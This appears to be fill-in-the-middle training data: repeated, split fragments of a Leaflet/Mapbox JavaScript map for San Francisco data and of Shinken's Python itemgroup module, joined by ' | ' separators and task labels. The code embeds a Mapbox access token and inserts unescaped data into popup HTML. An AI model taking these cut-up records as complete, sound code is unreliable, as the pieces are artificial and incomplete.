this._div.innerHTML = (props && props.label ? '<b>' + props.label + '</b>' : '');
};
info.addTo($$.map);
function customLayer(data) {
if(!data) {
data = null;
}
return L.geoJson(data, {
pointToLayer: function(feature, latlng) {
if ($$.options.legendCategories.indexOf(feature.properties[column]) == -1) {
$$.options.legendCategories.push(feature.properties[column]);
}
return new L.CircleMarker(latlng, {
radius: 4,
color: '#000',
fillColor: $$.getColor($$.options.legendCategories.indexOf(feature.properties[column]) + 1, $$.options.legendCategories.length < 3 ? 3 : $$.options.legendCategories.length),
fillOpacity: 1,
stroke: true,
weight: 1,
opacity: .8
});
},
onEachFeature: bindPointPopup
});
}
function bindPointPopup(feature, layer) {
var popupContent = "<h1 class='popup-title'>" + feature.properties[popup.title] + "</h1>";
popupContent += "<p>" + feature.properties[popup.subtitle] + "</p>";
if (Array.isArray(popup.info)) {
popupContent += "<p>";
var info = popup.info;
for (var i = 0; i < info.length; i++) {
if (feature.properties[info[i]]) {
popupContent += "<b>" + info[i].replace(/_/g," ").toTitleCase() + "</b>: " + feature.properties[info[i]] + "</br>";
}
}
popupContent += "</p>";
}
layer.bindPopup(popupContent);
}
function getStyle(feature) {
var color = $$.getColor(feature.properties.scaledValue, feature.properties.scale);
return {
fillColor: color,
weight: 2,
opacity: 0.3,
color: '#808080',
fillOpacity: 0.7
};
}
function mousemove(e) {
var layer = e.target;
if (options.type != 'map-point') {
var value = "<p>" + layer.feature.properties.value + options.units + "</p>";
if (layer.feature.properties.margin) {
value += "<p>Margin of error: +/-" + layer.feature.properties.margin + "%</p>";
}
if (layer.feature.properties.value == -1) {
value = "No Data";
}
autoPopup.setLatLng(e.latlng);
autoPopup.setContent('<h1 class="popup-title">' + layer.feature.properties.LABEL + '</h2>' +
"<p>" + value + "</p>");
if (!autoPopup._map) autoPopup.openOn($$.map);
window.clearTimeout(closeTooltip);
}
// highlight feature
layer.setStyle({
weight: 3,
opacity: 0.4,
color: d3.rgb('#808080').darker()
});
if (!L.Browser.ie && !L.Browser.opera) {
layer.bringToBack();
}
info.update(layer.feature.properties);
}
function mouseout(e) {
var to = e.originalEvent.toElement;
if(options.type == 'map') {
$$.baseLayer.resetStyle(e.target);
} else {
$$.overlayTemplate.resetStyle(e.target);
}
if (options.type == 'map') {
closeTooltip = window.setTimeout(function() {
$$.map.closePopup();
}, 100);
}
info.update();
}
function zoomToFeature(e) {
if (map.getZoom() >= 12) {
map.setView(e.latlng, map.getZoom() + 1);
} else {
map.fitBounds(e.target.getBounds());
}
}
function setOverlayLayers() {
//Todo: abstract this so that I can pass in names of layers earlier on, for now, these are hard coded
var baseDefinition = {
style: {
weight: 2,
opacity: 0.4,
color: '#808080',
fillOpacity: 0
},
onEachFeature: onEachFeature
}
var overlayLayers = {
"No Overlay": new L.layerGroup(),
"Supervisor Districts": new L.geoJson($$.overlayData[0], baseDefinition),
"Neighborhoods": new L.geoJson($$.overlayData[1], baseDefinition)
}
$$.overlayTemplate = new L.geoJson($$.overlayData[1], baseDefinition);
L.control.layers(overlayLayers, null).addTo($$.map);
}
};
/*
Get color from colorbrewer
*/
HubMap.prototype.getColor = function(num,s) {
if (num === -1) {
return "transparent";
}
return colorbrewer[this.options.colors][s][num - 1];
};
/*
Generate and set the legend
*/
HubMap.prototype.buildLegend = function() {
var $$ = this, options = $$.options,
categories = $$.options.legendCategories, colors = options.colors, scale = options.scale;
if(options.type == 'map-point') {
var labels = [];
var container = $('<div>');
var title = $('<span>');
title.html('<b>Legend (click to filter)</b>');
container.append(title);
for (var i = 0; i < categories.length; i++) {
var item = $('<div class="legend-item">');
var symbol = item.append($('<i>').css("background", $$.getColor(i + 1, categories.length)));
var checkbox = item.append($('<input class="legend-filter" type="checkbox" id="' + i + '" checked="true" style="display:none;" value="' + categories[i] + '" />'));
var label = $('<span>').html(categories[i]);
item.append(label);
container.append(item);
labels.push(label);
}
$$.legend = $('<div>').append(container).html();
return this;
} else {
var legendColors = d3.scale.quantile()
.domain($$.valuesOnlyArray)
.range(colorbrewer[colors][scale]);
var labels = [];
for (var i = 0; i < scale; i++) {
var range = legendColors.invertExtent(colorbrewer[colors][scale][i]);
from = Math.round(range[0] * 10) / 10;
to = Math.round(range[1] * 10) / 10;
labels.push(
'<i style="background:' + $$.getColor(i + 1, scale) + '"></i> ' +
from + (to ? '–' + to : '+') + options.units);
}
var legendTitle = (options.legendTitle == '' ? 'Legend' : options.legendTitle);
$$.legend = '<span><b>' + legendTitle + '</b></span><br>' + labels.join('<br>');
return this;
}
};
HubMap.prototype.getOverlayData = function(cb) {
$$ = this, options = $$.options;
for (var i = 0; i < $$.overlays.length; i++) {
(function(i) {
$.getJSON($$.overlays[i], function(geojson) {
$$.overlayData[i] = geojson;
}).done(function() {
if(i == $$.overlays.length - 1) {
cb();
}
});
})(i);
}
}
HubMap.prototype.bindInteractive = function() {
var $$ = this, options = $$.options;
$('#' + options.container).off('click').on('click', '.legend-item', function(e) {
$(this).children('.legend-filter').prop('checked') ? $(this).children('.legend-filter').prop('checked', false) : $(this).children('.legend-filter').prop('checked', true);
$(this).children('i').toggleClass('off');
var enabled = {};
$('.legend-filter').each(function(i, el) {
if ($(el).prop('checked')) enabled[$(el).val()] = true;
});
$$.baseLayer.clearLayers();
$$.baseLayer.options.filter = function(feature, layer) {
return (feature.properties[options.x] in enabled);
}
$$.baseLayer.addData($$.data);
});
}
hubMap.generate = function(options, container) {
if (container) {
options.container = container;
}
var hubMap = new HubMap(options);
hubMap.loadData();
return hubMap
} | {
feature.properties.margin = parseFloat(dataObject[margin]);
} | conditional_block |
maps.js | var hubMap = {
version: ".1"
};
function HubMap(options) |
HubMap.prototype.getMap = function() {
return this.map
}
/*
Load and process data for use in the map
*/
HubMap.prototype.loadData = function() {
var $$ = this, options = $$.options;
var data = (/^https?:\/\//.test(options.data)) ? options.data : '/data-browser/data/' + options.data;
$$.options.dataType = (data.indexOf("geojson") > -1 ? "geojson" : data.indexOf("json") > -1 ? "json" : data.indexOf("csv") > -1 ? "csv" : false);
if(!options.dataType) {
throw new Error('Data is not one of either json, geojson or csv');
}
if(options.type == 'map-point') {
$$.getOverlayData(function() {
if(options.dataType == 'geojson') {
$.getJSON(data, function(geojson) {
$$.data = geojson;
$$.render();
});
} else if(options.dataType == 'csv') {
var layer = omnivore.csv(data).on('ready',function() {
$$.data = layer.toGeoJSON();
$$.render();
});
}
});
} else if(options.type == 'map') {
$.ajax({
type: "GET",
url: data,
dataType: "text",
success: function(data) {
json = scaleData(d3.csv.parse(data));
$.getJSON('/data-browser/data/sf_census_tracts.json', function(geodata) {
$$.data = addDataToGeoJson(json, geodata);
$$.render();
});
}
});
}
function scaleData(data) {
$$.valuesOnlyArray = extractValuesFromObjectArray(data);
quantizer = new Quantizer($$.valuesOnlyArray, options.scale);
$.each(data, function(i, dataObject) {
dataObject.scaledValue = quantizer.quantileNumber(parseFloat(dataObject[options.x]));
});
return data;
}
function extractValuesFromObjectArray(dataObjectArray) {
return $.map(dataObjectArray, function(dataObject) {
return parseFloat(dataObject[options.x]);
});
}
function Quantizer(dataArray, s) {
var min = d3.min(dataArray);
var max = d3.max(dataArray);
this.quantizeNumber = d3.scale.quantize()
.domain([min, max])
.range(d3.range(1, s + 1)); // Start with only mapping on 1-5 color scale
this.quantileNumber = d3.scale.quantile()
.domain(dataArray)
.range(d3.range(1, s + 1));
}
function addDataToGeoJson(data, geojson) {
var column = options.x, margin = options.margin;
var dataHash = {};
$.each(data, function(i, dataObject) {
dataHash[dataObject['GEOID10']] = dataObject;
});
$.each(geojson.features, function(i, feature) {
geoid = feature.properties.GEOID10;
dataObject = dataHash[geoid];
if (dataObject && !(isNaN(parseFloat(dataObject[column])))) {
feature.properties.scaledValue = dataObject.scaledValue;
feature.properties.value = parseFloat(dataObject[column]);
feature.properties.scale = parseInt(options.scale);
if (margin !== "") {
feature.properties.margin = parseFloat(dataObject[margin]);
}
} else {
feature.properties.scaledValue = -1;
feature.properties.value = -1;
feature.properties.scale = parseInt(options.scale);
}
});
return geojson;
}
};
/*
Render the map
*/
HubMap.prototype.render = function() {
var $$ = this, options = $$.options, closeTooltip;
var popup = options.popup,
column = options.x,
colors = options.colors;
var onEachFeature = function(feature, layer) {
layer.on({
mousemove: mousemove,
mouseout: mouseout,
dblclick: zoomToFeature
});
}
L.mapbox.accessToken = 'pk.eyJ1IjoiZGF0YXNmIiwiYSI6Ilo3bVlHRDQifQ.7gkiPnZtioL8CnCvJ5z9Bg';
/* initialize map and extra controls */
var z = options.zoom || 12
$$.map = L.mapbox.map($$.options.container, 'datasf.j9b9ihf0').setView([37.767806, -122.438153], z);
L.control.fullscreen().addTo($$.map);
/* add base layer: this can be abstracted further to just pass in geojson data and layer function */
if(options.type == 'map-point') {
$$.baseLayer = customLayer($$.data).addTo($$.map);
setOverlayLayers();
} else if(options.type == 'map') {
if(options.dataType == 'csv') {
$$.baseLayer = L.geoJson($$.data, {
style: getStyle,
onEachFeature: onEachFeature
}).addTo($$.map);
var autoPopup = new L.Popup({
autoPan: false
});
}
}
if(!$$.options.legendCategories) {
$$.buildLegend();
$$.map.legendControl.addLegend($$.legend);
}
$$.bindInteractive();
var info = L.control({
position: 'bottomleft'
});
info.onAdd = function(map) {
this._div = L.DomUtil.create('div', 'info');
this.update();
return this._div;
};
info.update = function(props) {
this._div.innerHTML = (props && props.label ? '<b>' + props.label + '</b>' : '');
};
info.addTo($$.map);
function customLayer(data) {
if(!data) {
data = null;
}
return L.geoJson(data, {
pointToLayer: function(feature, latlng) {
if ($$.options.legendCategories.indexOf(feature.properties[column]) == -1) {
$$.options.legendCategories.push(feature.properties[column]);
}
return new L.CircleMarker(latlng, {
radius: 4,
color: '#000',
fillColor: $$.getColor($$.options.legendCategories.indexOf(feature.properties[column]) + 1, $$.options.legendCategories.length < 3 ? 3 : $$.options.legendCategories.length),
fillOpacity: 1,
stroke: true,
weight: 1,
opacity: .8
});
},
onEachFeature: bindPointPopup
});
}
function bindPointPopup(feature, layer) {
var popupContent = "<h1 class='popup-title'>" + feature.properties[popup.title] + "</h1>";
popupContent += "<p>" + feature.properties[popup.subtitle] + "</p>";
if (Array.isArray(popup.info)) {
popupContent += "<p>";
var info = popup.info;
for (var i = 0; i < info.length; i++) {
if (feature.properties[info[i]]) {
popupContent += "<b>" + info[i].replace(/_/g," ").toTitleCase() + "</b>: " + feature.properties[info[i]] + "</br>";
}
}
popupContent += "</p>";
}
layer.bindPopup(popupContent);
}
function getStyle(feature) {
var color = $$.getColor(feature.properties.scaledValue, feature.properties.scale);
return {
fillColor: color,
weight: 2,
opacity: 0.3,
color: '#808080',
fillOpacity: 0.7
};
}
function mousemove(e) {
var layer = e.target;
if (options.type != 'map-point') {
var value = "<p>" + layer.feature.properties.value + options.units + "</p>";
if (layer.feature.properties.margin) {
value += "<p>Margin of error: +/-" + layer.feature.properties.margin + "%</p>";
}
if (layer.feature.properties.value == -1) {
value = "No Data";
}
autoPopup.setLatLng(e.latlng);
autoPopup.setContent('<h1 class="popup-title">' + layer.feature.properties.LABEL + '</h2>' +
"<p>" + value + "</p>");
if (!autoPopup._map) autoPopup.openOn($$.map);
window.clearTimeout(closeTooltip);
}
// highlight feature
layer.setStyle({
weight: 3,
opacity: 0.4,
color: d3.rgb('#808080').darker()
});
if (!L.Browser.ie && !L.Browser.opera) {
layer.bringToBack();
}
info.update(layer.feature.properties);
}
function mouseout(e) {
var to = e.originalEvent.toElement;
if(options.type == 'map') {
$$.baseLayer.resetStyle(e.target);
} else {
$$.overlayTemplate.resetStyle(e.target);
}
if (options.type == 'map') {
closeTooltip = window.setTimeout(function() {
$$.map.closePopup();
}, 100);
}
info.update();
}
function zoomToFeature(e) {
if (map.getZoom() >= 12) {
map.setView(e.latlng, map.getZoom() + 1);
} else {
map.fitBounds(e.target.getBounds());
}
}
function setOverlayLayers() {
//Todo: abstract this so that I can pass in names of layers earlier on, for now, these are hard coded
var baseDefinition = {
style: {
weight: 2,
opacity: 0.4,
color: '#808080',
fillOpacity: 0
},
onEachFeature: onEachFeature
}
var overlayLayers = {
"No Overlay": new L.layerGroup(),
"Supervisor Districts": new L.geoJson($$.overlayData[0], baseDefinition),
"Neighborhoods": new L.geoJson($$.overlayData[1], baseDefinition)
}
$$.overlayTemplate = new L.geoJson($$.overlayData[1], baseDefinition);
L.control.layers(overlayLayers, null).addTo($$.map);
}
};
/*
Get color from colorbrewer
*/
HubMap.prototype.getColor = function(num,s) {
if (num === -1) {
return "transparent";
}
return colorbrewer[this.options.colors][s][num - 1];
};
/*
Generate and set the legend
*/
HubMap.prototype.buildLegend = function() {
var $$ = this, options = $$.options,
categories = $$.options.legendCategories, colors = options.colors, scale = options.scale;
if(options.type == 'map-point') {
var labels = [];
var container = $('<div>');
var title = $('<span>');
title.html('<b>Legend (click to filter)</b>');
container.append(title);
for (var i = 0; i < categories.length; i++) {
var item = $('<div class="legend-item">');
var symbol = item.append($('<i>').css("background", $$.getColor(i + 1, categories.length)));
var checkbox = item.append($('<input class="legend-filter" type="checkbox" id="' + i + '" checked="true" style="display:none;" value="' + categories[i] + '" />'));
var label = $('<span>').html(categories[i]);
item.append(label);
container.append(item);
labels.push(label);
}
$$.legend = $('<div>').append(container).html();
return this;
} else {
var legendColors = d3.scale.quantile()
.domain($$.valuesOnlyArray)
.range(colorbrewer[colors][scale]);
var labels = [];
for (var i = 0; i < scale; i++) {
var range = legendColors.invertExtent(colorbrewer[colors][scale][i]);
from = Math.round(range[0] * 10) / 10;
to = Math.round(range[1] * 10) / 10;
labels.push(
'<i style="background:' + $$.getColor(i + 1, scale) + '"></i> ' +
from + (to ? '–' + to : '+') + options.units);
}
var legendTitle = (options.legendTitle == '' ? 'Legend' : options.legendTitle);
$$.legend = '<span><b>' + legendTitle + '</b></span><br>' + labels.join('<br>');
return this;
}
};
HubMap.prototype.getOverlayData = function(cb) {
$$ = this, options = $$.options;
for (var i = 0; i < $$.overlays.length; i++) {
(function(i) {
$.getJSON($$.overlays[i], function(geojson) {
$$.overlayData[i] = geojson;
}).done(function() {
if(i == $$.overlays.length - 1) {
cb();
}
});
})(i);
}
}
HubMap.prototype.bindInteractive = function() {
var $$ = this, options = $$.options;
$('#' + options.container).off('click').on('click', '.legend-item', function(e) {
$(this).children('.legend-filter').prop('checked') ? $(this).children('.legend-filter').prop('checked', false) : $(this).children('.legend-filter').prop('checked', true);
$(this).children('i').toggleClass('off');
var enabled = {};
$('.legend-filter').each(function(i, el) {
if ($(el).prop('checked')) enabled[$(el).val()] = true;
});
$$.baseLayer.clearLayers();
$$.baseLayer.options.filter = function(feature, layer) {
return (feature.properties[options.x] in enabled);
}
$$.baseLayer.addData($$.data);
});
}
hubMap.generate = function(options, container) {
if (container) {
options.container = container;
}
var hubMap = new HubMap(options);
hubMap.loadData();
return hubMap
} | {
this.options = options;
this.data = "";
this.map = false;
this.legend = "";
this.options.scale = (options.scale !== "" ? parseInt(options.scale) : null);
this.options.legendCategories = options.legendCategories || [];
this.baseLayer = "";
this.valuesOnlyArray = [];
/* default overlays */
this.overlays = ['/data-browser/data/sup_districts.json', '/data-browser/data/neighborhoods.json'];
this.overlayData = [];
this.overlayTemplate = "";
} | identifier_body |
itemgroup.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (C) 2009-2014:
# Gabes Jean, [email protected]
# Gerhard Lausser, [email protected]
# Gregory Starck, [email protected]
# Hartmut Goebel, [email protected]
#
# This file is part of Shinken.
#
# Shinken is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Shinken is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Shinken. If not, see <http://www.gnu.org/licenses/>.
# And itemgroup is like a item, but it's a group of items :)
from item import Item, Items
from shinken.brok import Brok
from shinken.property import StringProp, ListProp, ToGuessProp
from shinken.log import logger
# TODO: subclass Item & Items for Itemgroup & Itemgroups?
class Itemgroup(Item):
id = 0
properties = Item.properties.copy()
properties.update({
'members': ListProp(fill_brok=['full_status'], default=None, split_on_coma=True),
# Shinken specific
'unknown_members': ListProp(default=None),
})
def __init__(self, params={}):
self.id = self.__class__.id
self.__class__.id += 1
cls = self.__class__
self.init_running_properties()
for key in params:
if key in self.properties:
val = self.properties[key].pythonize(params[key])
elif key in self.running_properties:
warning = "using a the running property %s in a config file" % key
self.configuration_warnings.append(warning)
val = self.running_properties[key].pythonize(params[key])
else:
warning = "Guessing the property %s type because it is not in %s object properties" % \
(key, cls.__name__)
self.configuration_warnings.append(warning)
val = ToGuessProp.pythonize(params[key])
setattr(self, key, val)
# Copy the groups properties EXCEPT the members
# members need to be fill after manually
def copy_shell(self):
cls = self.__class__
old_id = cls.id
new_i = cls() # create a new group
new_i.id = self.id # with the same id
cls.id = old_id # Reset the Class counter | val = getattr(self, prop)
setattr(new_i, prop, val)
# but no members
new_i.members = []
return new_i
def replace_members(self, members):
self.members = members
# If a prop is absent and is not required, put the default value
def fill_default(self):
cls = self.__class__
for prop, entry in cls.properties.items():
if not hasattr(self, prop) and not entry.required:
value = entry.default
setattr(self, prop, value)
def add_string_member(self, member):
add_fun = list.extend if isinstance(member, list) else list.append
if not hasattr(self, "members"):
self.members = []
add_fun(self.members, member)
def add_string_unknown_member(self, member):
add_fun = list.extend if isinstance(member, list) else list.append
if not self.unknown_members:
self.unknown_members = []
add_fun(self.unknown_members, member)
def __str__(self):
return str(self.__dict__) + '\n'
def __iter__(self):
return self.members.__iter__()
def __delitem__(self, i):
try:
self.members.remove(i)
except ValueError:
pass
# a item group is correct if all members actually exists,
# so if unknown_members is still []
def is_correct(self):
res = True
if self.unknown_members:
for m in self.unknown_members:
logger.error("[itemgroup::%s] as %s, got unknown member %s", self.get_name(), self.__class__.my_type, m)
res = False
if self.configuration_errors != []:
for err in self.configuration_errors:
logger.error("[itemgroup] %s", err)
res = False
return res
def has(self, prop):
return hasattr(self, prop)
# Get a brok with hostgroup info (like id, name)
# members is special: list of (id, host_name) for database info
def get_initial_status_brok(self):
cls = self.__class__
data = {}
# Now config properties
for prop, entry in cls.properties.items():
if entry.fill_brok != []:
if self.has(prop):
data[prop] = getattr(self, prop)
# Here members is just a bunch of host, I need name in place
data['members'] = []
for i in self.members:
# it look like lisp! ((( ..))), sorry....
data['members'].append((i.id, i.get_name()))
b = Brok('initial_' + cls.my_type + '_status', data)
return b
class Itemgroups(Items):
# If a prop is absent and is not required, put the default value
def fill_default(self):
for i in self:
i.fill_default()
def add(self, ig):
self.add_item(ig)
def get_members_by_name(self, gname):
g = self.find_by_name(gname)
if g is None:
return []
return getattr(g, 'members', []) |
# Copy all properties
for prop in cls.properties:
if prop is not 'members':
if self.has(prop): | random_line_split |
itemgroup.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (C) 2009-2014:
# Gabes Jean, [email protected]
# Gerhard Lausser, [email protected]
# Gregory Starck, [email protected]
# Hartmut Goebel, [email protected]
#
# This file is part of Shinken.
#
# Shinken is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Shinken is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Shinken. If not, see <http://www.gnu.org/licenses/>.
# And itemgroup is like a item, but it's a group of items :)
from item import Item, Items
from shinken.brok import Brok
from shinken.property import StringProp, ListProp, ToGuessProp
from shinken.log import logger
# TODO: subclass Item & Items for Itemgroup & Itemgroups?
class Itemgroup(Item):
|
class Itemgroups(Items):
# If a prop is absent and is not required, put the default value
def fill_default(self):
for i in self:
i.fill_default()
def add(self, ig):
self.add_item(ig)
def get_members_by_name(self, gname):
g = self.find_by_name(gname)
if g is None:
return []
return getattr(g, 'members', [])
| id = 0
properties = Item.properties.copy()
properties.update({
'members': ListProp(fill_brok=['full_status'], default=None, split_on_coma=True),
# Shinken specific
'unknown_members': ListProp(default=None),
})
def __init__(self, params={}):
self.id = self.__class__.id
self.__class__.id += 1
cls = self.__class__
self.init_running_properties()
for key in params:
if key in self.properties:
val = self.properties[key].pythonize(params[key])
elif key in self.running_properties:
warning = "using a the running property %s in a config file" % key
self.configuration_warnings.append(warning)
val = self.running_properties[key].pythonize(params[key])
else:
warning = "Guessing the property %s type because it is not in %s object properties" % \
(key, cls.__name__)
self.configuration_warnings.append(warning)
val = ToGuessProp.pythonize(params[key])
setattr(self, key, val)
# Copy the groups properties EXCEPT the members
# members need to be fill after manually
def copy_shell(self):
cls = self.__class__
old_id = cls.id
new_i = cls() # create a new group
new_i.id = self.id # with the same id
cls.id = old_id # Reset the Class counter
# Copy all properties
for prop in cls.properties:
if prop is not 'members':
if self.has(prop):
val = getattr(self, prop)
setattr(new_i, prop, val)
# but no members
new_i.members = []
return new_i
def replace_members(self, members):
self.members = members
# If a prop is absent and is not required, put the default value
def fill_default(self):
cls = self.__class__
for prop, entry in cls.properties.items():
if not hasattr(self, prop) and not entry.required:
value = entry.default
setattr(self, prop, value)
def add_string_member(self, member):
add_fun = list.extend if isinstance(member, list) else list.append
if not hasattr(self, "members"):
self.members = []
add_fun(self.members, member)
def add_string_unknown_member(self, member):
add_fun = list.extend if isinstance(member, list) else list.append
if not self.unknown_members:
self.unknown_members = []
add_fun(self.unknown_members, member)
def __str__(self):
return str(self.__dict__) + '\n'
def __iter__(self):
return self.members.__iter__()
def __delitem__(self, i):
try:
self.members.remove(i)
except ValueError:
pass
# a item group is correct if all members actually exists,
# so if unknown_members is still []
def is_correct(self):
res = True
if self.unknown_members:
for m in self.unknown_members:
logger.error("[itemgroup::%s] as %s, got unknown member %s", self.get_name(), self.__class__.my_type, m)
res = False
if self.configuration_errors != []:
for err in self.configuration_errors:
logger.error("[itemgroup] %s", err)
res = False
return res
def has(self, prop):
return hasattr(self, prop)
# Get a brok with hostgroup info (like id, name)
# members is special: list of (id, host_name) for database info
def get_initial_status_brok(self):
cls = self.__class__
data = {}
# Now config properties
for prop, entry in cls.properties.items():
if entry.fill_brok != []:
if self.has(prop):
data[prop] = getattr(self, prop)
# Here members is just a bunch of host, I need name in place
data['members'] = []
for i in self.members:
# it look like lisp! ((( ..))), sorry....
data['members'].append((i.id, i.get_name()))
b = Brok('initial_' + cls.my_type + '_status', data)
return b | identifier_body |
itemgroup.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (C) 2009-2014:
# Gabes Jean, [email protected]
# Gerhard Lausser, [email protected]
# Gregory Starck, [email protected]
# Hartmut Goebel, [email protected]
#
# This file is part of Shinken.
#
# Shinken is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Shinken is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Shinken. If not, see <http://www.gnu.org/licenses/>.
# And itemgroup is like a item, but it's a group of items :)
from item import Item, Items
from shinken.brok import Brok
from shinken.property import StringProp, ListProp, ToGuessProp
from shinken.log import logger
# TODO: subclass Item & Items for Itemgroup & Itemgroups?
class Itemgroup(Item):
id = 0
properties = Item.properties.copy()
properties.update({
'members': ListProp(fill_brok=['full_status'], default=None, split_on_coma=True),
# Shinken specific
'unknown_members': ListProp(default=None),
})
def __init__(self, params={}):
self.id = self.__class__.id
self.__class__.id += 1
cls = self.__class__
self.init_running_properties()
for key in params:
if key in self.properties:
val = self.properties[key].pythonize(params[key])
elif key in self.running_properties:
warning = "using a the running property %s in a config file" % key
self.configuration_warnings.append(warning)
val = self.running_properties[key].pythonize(params[key])
else:
warning = "Guessing the property %s type because it is not in %s object properties" % \
(key, cls.__name__)
self.configuration_warnings.append(warning)
val = ToGuessProp.pythonize(params[key])
setattr(self, key, val)
# Copy the groups properties EXCEPT the members
# members need to be fill after manually
def copy_shell(self):
cls = self.__class__
old_id = cls.id
new_i = cls() # create a new group
new_i.id = self.id # with the same id
cls.id = old_id # Reset the Class counter
# Copy all properties
for prop in cls.properties:
if prop is not 'members':
if self.has(prop):
val = getattr(self, prop)
setattr(new_i, prop, val)
# but no members
new_i.members = []
return new_i
def replace_members(self, members):
self.members = members
# If a prop is absent and is not required, put the default value
def fill_default(self):
cls = self.__class__
for prop, entry in cls.properties.items():
if not hasattr(self, prop) and not entry.required:
value = entry.default
setattr(self, prop, value)
def add_string_member(self, member):
add_fun = list.extend if isinstance(member, list) else list.append
if not hasattr(self, "members"):
|
add_fun(self.members, member)
def add_string_unknown_member(self, member):
add_fun = list.extend if isinstance(member, list) else list.append
if not self.unknown_members:
self.unknown_members = []
add_fun(self.unknown_members, member)
def __str__(self):
return str(self.__dict__) + '\n'
def __iter__(self):
return self.members.__iter__()
def __delitem__(self, i):
try:
self.members.remove(i)
except ValueError:
pass
# a item group is correct if all members actually exists,
# so if unknown_members is still []
def is_correct(self):
res = True
if self.unknown_members:
for m in self.unknown_members:
logger.error("[itemgroup::%s] as %s, got unknown member %s", self.get_name(), self.__class__.my_type, m)
res = False
if self.configuration_errors != []:
for err in self.configuration_errors:
logger.error("[itemgroup] %s", err)
res = False
return res
def has(self, prop):
return hasattr(self, prop)
# Get a brok with hostgroup info (like id, name)
# members is special: list of (id, host_name) for database info
def get_initial_status_brok(self):
cls = self.__class__
data = {}
# Now config properties
for prop, entry in cls.properties.items():
if entry.fill_brok != []:
if self.has(prop):
data[prop] = getattr(self, prop)
# Here members is just a bunch of host, I need name in place
data['members'] = []
for i in self.members:
# it look like lisp! ((( ..))), sorry....
data['members'].append((i.id, i.get_name()))
b = Brok('initial_' + cls.my_type + '_status', data)
return b
class Itemgroups(Items):
# If a prop is absent and is not required, put the default value
def fill_default(self):
for i in self:
i.fill_default()
def add(self, ig):
self.add_item(ig)
def get_members_by_name(self, gname):
g = self.find_by_name(gname)
if g is None:
return []
return getattr(g, 'members', [])
| self.members = [] | conditional_block |
itemgroup.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (C) 2009-2014:
# Gabes Jean, [email protected]
# Gerhard Lausser, [email protected]
# Gregory Starck, [email protected]
# Hartmut Goebel, [email protected]
#
# This file is part of Shinken.
#
# Shinken is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Shinken is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Shinken. If not, see <http://www.gnu.org/licenses/>.
# And itemgroup is like a item, but it's a group of items :)
from item import Item, Items
from shinken.brok import Brok
from shinken.property import StringProp, ListProp, ToGuessProp
from shinken.log import logger
# TODO: subclass Item & Items for Itemgroup & Itemgroups?
class Itemgroup(Item):
id = 0
properties = Item.properties.copy()
properties.update({
'members': ListProp(fill_brok=['full_status'], default=None, split_on_coma=True),
# Shinken specific
'unknown_members': ListProp(default=None),
})
def __init__(self, params={}):
self.id = self.__class__.id
self.__class__.id += 1
cls = self.__class__
self.init_running_properties()
for key in params:
if key in self.properties:
val = self.properties[key].pythonize(params[key])
elif key in self.running_properties:
warning = "using a the running property %s in a config file" % key
self.configuration_warnings.append(warning)
val = self.running_properties[key].pythonize(params[key])
else:
warning = "Guessing the property %s type because it is not in %s object properties" % \
(key, cls.__name__)
self.configuration_warnings.append(warning)
val = ToGuessProp.pythonize(params[key])
setattr(self, key, val)
# Copy the groups properties EXCEPT the members
# members need to be fill after manually
def copy_shell(self):
cls = self.__class__
old_id = cls.id
new_i = cls() # create a new group
new_i.id = self.id # with the same id
cls.id = old_id # Reset the Class counter
# Copy all properties
for prop in cls.properties:
if prop is not 'members':
if self.has(prop):
val = getattr(self, prop)
setattr(new_i, prop, val)
# but no members
new_i.members = []
return new_i
def replace_members(self, members):
self.members = members
# If a prop is absent and is not required, put the default value
def fill_default(self):
cls = self.__class__
for prop, entry in cls.properties.items():
if not hasattr(self, prop) and not entry.required:
value = entry.default
setattr(self, prop, value)
def add_string_member(self, member):
add_fun = list.extend if isinstance(member, list) else list.append
if not hasattr(self, "members"):
self.members = []
add_fun(self.members, member)
def add_string_unknown_member(self, member):
add_fun = list.extend if isinstance(member, list) else list.append
if not self.unknown_members:
self.unknown_members = []
add_fun(self.unknown_members, member)
def __str__(self):
return str(self.__dict__) + '\n'
def __iter__(self):
return self.members.__iter__()
def | (self, i):
try:
self.members.remove(i)
except ValueError:
pass
# a item group is correct if all members actually exists,
# so if unknown_members is still []
def is_correct(self):
res = True
if self.unknown_members:
for m in self.unknown_members:
logger.error("[itemgroup::%s] as %s, got unknown member %s", self.get_name(), self.__class__.my_type, m)
res = False
if self.configuration_errors != []:
for err in self.configuration_errors:
logger.error("[itemgroup] %s", err)
res = False
return res
def has(self, prop):
return hasattr(self, prop)
# Get a brok with hostgroup info (like id, name)
# members is special: list of (id, host_name) for database info
def get_initial_status_brok(self):
cls = self.__class__
data = {}
# Now config properties
for prop, entry in cls.properties.items():
if entry.fill_brok != []:
if self.has(prop):
data[prop] = getattr(self, prop)
# Here members is just a bunch of host, I need name in place
data['members'] = []
for i in self.members:
# it look like lisp! ((( ..))), sorry....
